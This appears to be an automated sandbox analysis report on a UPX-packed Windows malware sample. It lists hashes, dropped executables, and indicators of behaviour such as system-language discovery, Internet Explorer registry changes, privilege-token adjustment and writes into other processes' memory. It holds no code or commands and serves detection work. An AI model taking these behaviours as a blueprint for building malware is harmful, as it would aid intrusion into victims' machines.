68662ee780dd41f2d0f958811ca0252a178c0fbf4fb52f32e462ebcc0aa309c5

Analysis

max time kernel
147s
max time network
127s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02/10/2024, 11:02

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
Size

112KB
MD5

0a5663c35f733883fad9516026abc53a
SHA1

06c3f4c3788dcfefa80aec2a82c08aa6b8071630
SHA256

68662ee780dd41f2d0f958811ca0252a178c0fbf4fb52f32e462ebcc0aa309c5
SHA512

e9a9e4c54237a1813bec21d627e72b46685d94d4fbeee3fc21ba8faba68835660c5139bebc07141e721996c07deb07e56372952e0839f76e2a935856a109b1e7
SSDEEP

1536:Bf6rJeUzbfX5jbNFBRD19CMZI/+OT7P5GXFbY58K+Dd8kV3ZS:wrJeU3fX5VjRDjtZI2OXPUXe58nDqkrS

Score

7^/10

discovery upx

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
2760	CP.exe
3048	pjhcwuomyt.exe
1720	CP.exe
2432	CP.exe
264	i_pjhcwuomyt.exe
2040	CP.exe
2328	rljdbwqoig.exe
2912	CP.exe
1600	CP.exe
1816	i_rljdbwqoig.exe
1392	CP.exe
552	eytqljdxvq.exe
2292	CP.exe
1760	CP.exe
1252	i_eytqljdxvq.exe
2096	CP.exe
872	nlfdysqkic.exe
3000	CP.exe
1572	CP.exe
2752	i_nlfdysqkic.exe
1720	CP.exe
2760	lfdxvpkica.exe
3036	CP.exe
2448	CP.exe
2708	i_lfdxvpkica.exe
2836	CP.exe
1864	xsqkecxupj.exe
2576	CP.exe
620	CP.exe
1300	i_xsqkecxupj.exe
2656	CP.exe
1644	hczusmhezx.exe
2768	CP.exe
1916	CP.exe
2552	i_hczusmhezx.exe
2912	CP.exe
824	urmgezwrlj.exe
2040	CP.exe
2516	CP.exe
404	i_urmgezwrlj.exe
2164	CP.exe
980	ojhbztomge.exe
1516	CP.exe
1040	CP.exe
1156	i_ojhbztomge.exe
2576	CP.exe
756	bztolgdysq.exe
1260	CP.exe
820	CP.exe
2572	i_bztolgdysq.exe
1448	CP.exe
1504	olgaysqlfd.exe
2268	CP.exe
1232	CP.exe
1856	i_olgaysqlfd.exe
1916	CP.exe
2980	aysqkfdxvp.exe
2328	CP.exe
2008	CP.exe
1088	i_aysqkfdxvp.exe
1704	CP.exe
2444	ysnkfdxspk.exe
1144	CP.exe
2776	CP.exe

Loads dropped DLL 62 IoCs

pid	Process
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
3048	pjhcwuomyt.exe
3048	pjhcwuomyt.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2328	rljdbwqoig.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
552	eytqljdxvq.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
872	nlfdysqkic.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2760	lfdxvpkica.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
1864	xsqkecxupj.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
1644	hczusmhezx.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
824	urmgezwrlj.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
980	ojhbztomge.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
756	bztolgdysq.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
1504	olgaysqlfd.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2980	aysqkfdxvp.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2444	ysnkfdxspk.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
692	kicxupnhcz.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
1748	aupmhfzurm.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
1572	xrmcwuojgb.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2884	jecwrojgbv.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2804	wrljdbvqoi.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
820	jdbvqnigav.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2156	dbvqnigavs.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2468-0-0x00000000009D0000-0x0000000000A19000-memory.dmp	upx
behavioral1/files/0x0036000000015d48-10.dat	upx
behavioral1/memory/3048-11-0x00000000010B0000-0x00000000010F9000-memory.dmp	upx
behavioral1/memory/3048-16-0x00000000010B0000-0x00000000010F9000-memory.dmp	upx
behavioral1/files/0x0006000000016d73-24.dat	upx
behavioral1/memory/264-25-0x0000000000030000-0x0000000000079000-memory.dmp	upx
behavioral1/memory/264-28-0x0000000000030000-0x0000000000079000-memory.dmp	upx
behavioral1/memory/2468-30-0x00000000009D0000-0x0000000000A19000-memory.dmp	upx
behavioral1/files/0x0007000000016df5-49.dat	upx
behavioral1/memory/2328-50-0x0000000000CE0000-0x0000000000D29000-memory.dmp	upx
behavioral1/memory/2328-125-0x0000000000CE0000-0x0000000000D29000-memory.dmp	upx
behavioral1/files/0x0028000000016df5-473.dat	upx
behavioral1/memory/1816-474-0x0000000000870000-0x00000000008B9000-memory.dmp	upx
behavioral1/memory/1816-476-0x0000000000870000-0x00000000008B9000-memory.dmp	upx
behavioral1/memory/552-483-0x0000000000050000-0x0000000000099000-memory.dmp	upx
behavioral1/files/0x0029000000016df5-481.dat	upx
behavioral1/memory/552-485-0x0000000000050000-0x0000000000099000-memory.dmp	upx
behavioral1/memory/1252-491-0x0000000000DB0000-0x0000000000DF9000-memory.dmp	upx
behavioral1/files/0x002a000000016df5-490.dat	upx
behavioral1/memory/1252-494-0x0000000000DB0000-0x0000000000DF9000-memory.dmp	upx
behavioral1/memory/872-500-0x0000000000880000-0x00000000008C9000-memory.dmp	upx
behavioral1/files/0x002b000000016df5-499.dat	upx
behavioral1/memory/872-503-0x0000000000880000-0x00000000008C9000-memory.dmp	upx
behavioral1/files/0x002c000000016df5-508.dat	upx
behavioral1/memory/2752-509-0x0000000000FE0000-0x0000000001029000-memory.dmp	upx
behavioral1/memory/2752-511-0x0000000000FE0000-0x0000000001029000-memory.dmp	upx
behavioral1/files/0x002d000000016df5-517.dat	upx
behavioral1/memory/2760-518-0x0000000000A80000-0x0000000000AC9000-memory.dmp	upx
behavioral1/memory/2760-521-0x0000000000A80000-0x0000000000AC9000-memory.dmp	upx
behavioral1/files/0x002e000000016df5-526.dat	upx
behavioral1/memory/2708-527-0x0000000001360000-0x00000000013A9000-memory.dmp	upx
behavioral1/memory/2708-529-0x0000000001360000-0x00000000013A9000-memory.dmp	upx
behavioral1/files/0x0006000000017570-534.dat	upx
behavioral1/memory/1864-535-0x00000000009D0000-0x0000000000A19000-memory.dmp	upx
behavioral1/memory/1864-538-0x00000000009D0000-0x0000000000A19000-memory.dmp	upx
behavioral1/memory/1300-545-0x0000000000060000-0x00000000000A9000-memory.dmp	upx
behavioral1/files/0x0007000000017570-544.dat	upx
behavioral1/memory/1300-548-0x0000000000060000-0x00000000000A9000-memory.dmp	upx
behavioral1/memory/1644-554-0x0000000000DB0000-0x0000000000DF9000-memory.dmp	upx
behavioral1/files/0x0004000000004ed7-553.dat	upx
behavioral1/memory/1644-557-0x0000000000DB0000-0x0000000000DF9000-memory.dmp	upx
behavioral1/files/0x0005000000004ed7-562.dat	upx
behavioral1/memory/2552-563-0x0000000000120000-0x0000000000169000-memory.dmp	upx
behavioral1/memory/2552-566-0x0000000000120000-0x0000000000169000-memory.dmp	upx
behavioral1/files/0x0006000000004ed7-571.dat	upx
behavioral1/memory/824-573-0x0000000000FA0000-0x0000000000FE9000-memory.dmp	upx
behavioral1/memory/824-575-0x0000000000FA0000-0x0000000000FE9000-memory.dmp	upx
behavioral1/memory/404-578-0x0000000000DE0000-0x0000000000E29000-memory.dmp	upx
behavioral1/memory/404-580-0x0000000000DE0000-0x0000000000E29000-memory.dmp	upx
behavioral1/memory/980-584-0x0000000001230000-0x0000000001279000-memory.dmp	upx
behavioral1/memory/980-585-0x0000000001230000-0x0000000001279000-memory.dmp	upx
behavioral1/memory/1156-588-0x0000000000CF0000-0x0000000000D39000-memory.dmp	upx
behavioral1/memory/1156-1022-0x0000000000CF0000-0x0000000000D39000-memory.dmp	upx
behavioral1/memory/756-1025-0x0000000000230000-0x0000000000279000-memory.dmp	upx
behavioral1/memory/756-1026-0x0000000000230000-0x0000000000279000-memory.dmp	upx
behavioral1/memory/2572-1030-0x0000000000F60000-0x0000000000FA9000-memory.dmp	upx
behavioral1/memory/2572-1032-0x0000000000F60000-0x0000000000FA9000-memory.dmp	upx
behavioral1/memory/1504-1035-0x00000000001F0000-0x0000000000239000-memory.dmp	upx
behavioral1/memory/1504-1037-0x00000000001F0000-0x0000000000239000-memory.dmp	upx
behavioral1/memory/1856-1040-0x00000000013C0000-0x0000000001409000-memory.dmp	upx
behavioral1/memory/1856-1043-0x00000000013C0000-0x0000000001409000-memory.dmp	upx
behavioral1/memory/2980-1046-0x0000000000D50000-0x0000000000D99000-memory.dmp	upx
behavioral1/memory/2980-1047-0x0000000000D50000-0x0000000000D99000-memory.dmp	upx
behavioral1/memory/1088-1050-0x00000000009A0000-0x00000000009E9000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eytqljdxvq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hczusmhezx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xrmcwuojgb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aupmhfzurm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pjhcwuomyt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lfdxvpkica.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xsqkecxupj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aysqkfdxvp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jecwrojgbv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wrljdbvqoi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ojhbztomge.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bztolgdysq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	olgaysqlfd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kicxupnhcz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jdbvqnigav.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dbvqnigavs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rljdbwqoig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nlfdysqkic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	urmgezwrlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ysnkfdxspk.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2036	ipconfig.exe
1712	ipconfig.exe
1508	ipconfig.exe
2848	ipconfig.exe
2260	ipconfig.exe
2984	ipconfig.exe
1692	ipconfig.exe
2924	ipconfig.exe
2272	ipconfig.exe
2084	ipconfig.exe
2304	ipconfig.exe
2900	ipconfig.exe
2768	ipconfig.exe
2976	ipconfig.exe
3004	ipconfig.exe
2228	ipconfig.exe
2144	ipconfig.exe
1900	ipconfig.exe
1620	ipconfig.exe
1856	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf6000000000200000000001066000000010000200000006436d3517bcb8ece7f122076be668f5c07ad66723ea0bb609d63eb85a897f46b000000000e80000000020000200000000e25a29cd0b34e4fa76da1882bc37503e3344cd63bb1d289184b5495244f7dd8900000003ee18e52bd228a9f2bebdc027b6dc677eabdb0f98b6f0fb5513ec04d4301cd778e363e44971e1342d7102dc22966aabcaec7eaa4d7b245d4849b0a7f939b6ac2d63a33569e130d034f0a9fe2cba86c109e57d05fa6e6c832c7d97c77123b34da5e84340d50065f1614339838ecdbe092de34edb3d7a585a7c76fe2835965020c21cd1037127384c1c05a9c35d9ae238c40000000ce9d1d359a9d3fe16082ca7dbb10e952d7a97884d5a56a5098d1c998f42a5d62213b612904fa2597644e7e6dc5bb915593ce94e4553ed54fb66ce0935de438b4	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434028838"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{DDF2D801-80AD-11EF-991F-EE9D5ADBD8E3} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90772db5ba14db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf6000000000200000000001066000000010000200000009412957da068713682ae545242e4b92a5048c08a760b1d493487872d6a9a731d000000000e80000000020000200000006cf837b902d2de8a0ec17e5cfa9d6e6406ac1e7401c5168a4e76057589f08781200000007784a44ece8aa35b54d5134da525fa357f7debafa7f308cf478ddcdf08d17c2c40000000abb56ffdd57ea9821ed072bfd18858aaa7d465d5db7cc72dd0864eea66bc3ff582004fc38d3b7e9071eb0c7f0663c55b22db2901c73fa91b55cd8fd4d60ec2e0	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
3048	pjhcwuomyt.exe
3048	pjhcwuomyt.exe
3048	pjhcwuomyt.exe
3048	pjhcwuomyt.exe
3048	pjhcwuomyt.exe
3048	pjhcwuomyt.exe
3048	pjhcwuomyt.exe
264	i_pjhcwuomyt.exe
264	i_pjhcwuomyt.exe
264	i_pjhcwuomyt.exe
264	i_pjhcwuomyt.exe
264	i_pjhcwuomyt.exe
264	i_pjhcwuomyt.exe
264	i_pjhcwuomyt.exe
2328	rljdbwqoig.exe
2328	rljdbwqoig.exe
2328	rljdbwqoig.exe
2328	rljdbwqoig.exe
2328	rljdbwqoig.exe
2328	rljdbwqoig.exe
2328	rljdbwqoig.exe
1816	i_rljdbwqoig.exe
1816	i_rljdbwqoig.exe
1816	i_rljdbwqoig.exe
1816	i_rljdbwqoig.exe
1816	i_rljdbwqoig.exe
1816	i_rljdbwqoig.exe
1816	i_rljdbwqoig.exe
552	eytqljdxvq.exe
552	eytqljdxvq.exe
552	eytqljdxvq.exe
552	eytqljdxvq.exe
552	eytqljdxvq.exe
552	eytqljdxvq.exe
552	eytqljdxvq.exe
1252	i_eytqljdxvq.exe

Suspicious behavior: LoadsDriver 20 IoCs

pid	Process
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	264	i_pjhcwuomyt.exe
Token: SeDebugPrivilege	1816	i_rljdbwqoig.exe
Token: SeDebugPrivilege	1252	i_eytqljdxvq.exe
Token: SeDebugPrivilege	2752	i_nlfdysqkic.exe
Token: SeDebugPrivilege	2708	i_lfdxvpkica.exe
Token: SeDebugPrivilege	1300	i_xsqkecxupj.exe
Token: SeDebugPrivilege	2552	i_hczusmhezx.exe
Token: SeDebugPrivilege	404	i_urmgezwrlj.exe
Token: SeDebugPrivilege	1156	i_ojhbztomge.exe
Token: SeDebugPrivilege	2572	i_bztolgdysq.exe
Token: SeDebugPrivilege	1856	i_olgaysqlfd.exe
Token: SeDebugPrivilege	1088	i_aysqkfdxvp.exe
Token: SeDebugPrivilege	2192	i_ysnkfdxspk.exe
Token: SeDebugPrivilege	1544	i_kicxupnhcz.exe
Token: SeDebugPrivilege	2956	i_aupmhfzurm.exe
Token: SeDebugPrivilege	2756	i_xrmcwuojgb.exe
Token: SeDebugPrivilege	1092	i_jecwrojgbv.exe
Token: SeDebugPrivilege	2716	i_wrljdbvqoi.exe
Token: SeDebugPrivilege	1448	i_jdbvqnigav.exe
Token: SeDebugPrivilege	1384	i_dbvqnigavs.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2080	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2080	iexplore.exe
2080	iexplore.exe
2720	IEXPLORE.EXE
2720	IEXPLORE.EXE
2720	IEXPLORE.EXE
2720	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2468 wrote to memory of 2080	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	30
PID 2468 wrote to memory of 2080	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	30
PID 2468 wrote to memory of 2080	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	30
PID 2468 wrote to memory of 2080	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	30
PID 2080 wrote to memory of 2720	2080	iexplore.exe	31
PID 2080 wrote to memory of 2720	2080	iexplore.exe	31
PID 2080 wrote to memory of 2720	2080	iexplore.exe	31
PID 2080 wrote to memory of 2720	2080	iexplore.exe	31
PID 2468 wrote to memory of 2760	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	32
PID 2468 wrote to memory of 2760	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	32
PID 2468 wrote to memory of 2760	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	32
PID 2468 wrote to memory of 2760	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	32
PID 3048 wrote to memory of 1720	3048	pjhcwuomyt.exe	35
PID 3048 wrote to memory of 1720	3048	pjhcwuomyt.exe	35
PID 3048 wrote to memory of 1720	3048	pjhcwuomyt.exe	35
PID 3048 wrote to memory of 1720	3048	pjhcwuomyt.exe	35
PID 2468 wrote to memory of 2432	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	38
PID 2468 wrote to memory of 2432	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	38
PID 2468 wrote to memory of 2432	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	38
PID 2468 wrote to memory of 2432	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	38
PID 2468 wrote to memory of 2040	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	40
PID 2468 wrote to memory of 2040	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	40
PID 2468 wrote to memory of 2040	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	40
PID 2468 wrote to memory of 2040	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	40
PID 2328 wrote to memory of 2912	2328	rljdbwqoig.exe	42
PID 2328 wrote to memory of 2912	2328	rljdbwqoig.exe	42
PID 2328 wrote to memory of 2912	2328	rljdbwqoig.exe	42
PID 2328 wrote to memory of 2912	2328	rljdbwqoig.exe	42
PID 2468 wrote to memory of 1600	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	45
PID 2468 wrote to memory of 1600	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	45
PID 2468 wrote to memory of 1600	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	45
PID 2468 wrote to memory of 1600	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	45
PID 2468 wrote to memory of 1392	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	47
